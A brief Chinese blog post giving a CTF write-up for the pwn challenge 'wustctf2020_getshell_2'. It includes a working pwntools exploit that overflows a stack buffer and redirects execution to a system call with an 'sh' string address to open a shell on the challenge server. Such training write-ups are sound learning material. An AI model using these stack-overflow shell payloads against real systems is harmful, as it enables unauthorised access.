wustctf2020_getshell_2

这题记到的东西就是直接调用函数找到call它的地方
找字符串可以用ROPgadget --binary 文件名 --string "sh"

点击查看代码
from pwn import *
io=remote("node4.buuoj.cn",29939)
io.recvuntil("/_/  /_/\\_,_//_/ /_/ /_//_\\_\\ \n")
elf=ELF("./wustctf2020_getshell_2")
payload='a'*(0x18+0x4)+p32(0x8048529)+p32(0x8048670)
io.sendline(payload)
io.interactive()
posted @ 2022-07-03 15:57  REPWNER  阅读(22)  评论(0)    收藏  举报